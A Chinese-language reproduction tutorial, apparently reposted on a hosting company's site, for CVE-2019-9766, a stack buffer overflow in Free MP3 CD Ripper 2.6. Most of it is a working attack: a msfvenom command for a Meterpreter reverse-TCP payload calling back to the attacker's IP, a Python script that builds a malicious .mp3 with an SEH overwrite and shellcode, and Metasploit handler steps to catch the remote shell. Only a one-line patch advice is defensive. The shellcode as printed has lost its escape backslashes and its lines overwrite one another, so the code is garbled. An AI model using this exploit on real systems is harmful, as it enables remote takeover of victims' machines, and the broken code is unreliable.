新西兰服务器

如何实现Free MP3 CD Ripper缓冲区溢出远程代码执行漏洞CVE-2019-9766复现


如何实现Free MP3 CD Ripper缓冲区溢出远程代码执行漏洞CVE-2019-9766复现

发布时间:2021-12-27 18:51:17 来源:高防服务器网 阅读:80 作者:柒染 栏目:安全技术

如何实现Free MP3 CD Ripper缓冲区溢出远程代码执行漏洞CVE-2019-9766复现,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。

漏洞简介:

Free MP3 CD Ripper是一款音频格式转换器。

Free MP3 CD Ripper 2.6版本中存在栈缓冲区溢出漏洞。远程攻击者可借助特制的.mp3文件利用该漏洞执行任意代码。

威胁类型

远程代码执行

威胁等级

漏洞编号

CVE-2019-9766

受影响系统及应用版本

Free MP3 CD Ripper 2.6

漏洞复现:

攻击机:kali2020 、kali2019  

ip:192.168.6.146  

受害机:win10     

ip:192.168.6.142

安装Free MP3 CD Ripper 2.6版本

1、搭建环境

Win10下载安装Free MP3 CD Ripper 2.6版本

 

利用msf生成反向连接的shellcode

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.6.146 lport=888 -f c --smallest

替换脚本中的shellcode.

编写生成.Mp3文件的脚本

#Stack-based buffer overflow in Free MP3 CD Ripper 2.6    buffer="A"*4116  NSEH="xebx06x90x90"  SEH="x84x20xe4x66"  nops="x90"*5  buf=""  buf="xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8bx50x30"  buf="x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff"  buf="xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf2x52"  buf="x57x8bx52x10x8bx4ax3cx8bx4cx11x78xe3x48x01xd1"  buf="x51x8bx59x20x01xd3x8bx49x18xe3x3ax49x8bx34x8b"  buf="x01xd6x31xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03"  buf="x7dxf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66x8b"  buf="x0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24"  buf="x24x5bx5bx61x59x5ax51xffxe0x5fx5fx5ax8bx12xeb"  buf="x8dx5dx68x33x32x00x00x68x77x73x32x5fx54x68x4c"  buf="x77x26x07x89xe8xffxd0xb8x90x01x00x00x29xc4x54"  buf="x50x68x29x80x6bx00xffxd5x6ax0ax68xc0xa8x6ex84"  buf="x68x02x00x03x78x89xe6x50x50x50x50x40x50x40x50"  buf="x68xeax0fxdfxe0xffxd5x97x6ax10x56x57x68x99xa5"  buf="x74x61xffxd5x85xc0x74x0cxffx4ex08x75xecx68xf0"  buf="xb5xa2x56xffxd5x6ax00x6ax04x56x57x68x02xd9xc8"  buf="x5fxffxd5x8bx36x6ax40x68x00x10x00x00x56x6ax00"  buf="x68x58xa4x53xe5xffxd5x93x53x6ax00x56x53x57x68"  buf="x02xd9xc8x5fxffxd5x01xc3x29xc6x75xeexc3";    pad="B"*(316-len(nops)-len(buf))  payload=buffer+NSEH+SEH+nops+buf+pad  try:      f=open("Test_Free_MP3.mp3","w")      print ("[+]Creating %s bytes mp3 Files..."%len(payload))      f.write(payload)      f.close()       print ("[+]mp3 File created successfully!")  except:        print ("File cannot be created!")

运行脚本,生成一个.MP3的文件

将生成的.mp3文件放到win10上(需要VMtools)

kali开启msfconsole

 使用exploit/multi/handler模块

设置lhost,lport,攻击载荷

Kali开启监听:

 Win10使用free MP3 CD ripper 打开mp3文件

 接收反弹的shell

执行命令

漏洞利用成功

PS: 说一个我踩的坑吧,真的头一次遇到这种情况:

漏洞利用攻击机需要用kali2019版本,2020版本不可以利用。用2020试了好多遍都没有成功,最后鬼使神差的用了2019就成功了。有遇到过这样情况的大佬分享一下经验吗。

2、修复建议

及时更新Free MP3 CD Ripper到最新版本

看完上述内容是否对您有帮助呢?如果还想对相关知识有进一步的了解或阅读更多相关文章,请关注高防服务器网行业资讯频道,感谢您对高防服务器网的支持。

[微信提示:高防服务器能助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。

[图文来源于网络,不代表本站立场,如有侵权,请联系高防服务器网删除]
[